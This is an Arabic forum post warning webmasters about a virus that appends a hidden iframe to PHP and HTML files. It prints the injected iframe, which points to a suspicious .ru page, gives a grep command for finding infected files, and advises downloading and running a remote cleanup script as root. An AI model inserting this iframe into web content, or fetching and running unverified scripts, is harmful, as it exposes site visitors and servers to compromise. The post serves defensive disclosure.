السلام عليكم
انتشر فى الاسبوع الاخير فيروس يصيب الملفات من النوع
php
HTML
و غيرها من ملفات الويب المعروفة .. الفيروس يقوم بإضافة كود HTML فى نهاية هذه الملفات الكود المضاف هو
<IFRAME name='StatPage' src='http://www.norton-kaspersky.ru/new/traff.php' width=5 height=5 style='display:none'></IFRAME>
للتأكد من وجود الفيروس على سيرفرك اتبع الاتى من خلال الروت اعطى الامر التالى بإستخدام الشل
find /home -name '*.*' -print | xargs grep 'norton-kaspersky' /dev/null
سوف يعطى لك الامر السابق تقرير بالملفات المصابة فى هذه الحالة يجب التخلص من الفيروس من كل الملفات المصابة فى السيرفر كاملا لعمل ذلك اعطى الامر التالى
cd ..
ثم نفذ الاوامر
wget http://www.cairohost.com/scan/scan.sh
sh scan.sh
برمجة /
خالد ممدوح
http://vbzoom.com
رد مع اقتباس
المشاركة الأصلية كتبت بواسطة Bo3oof
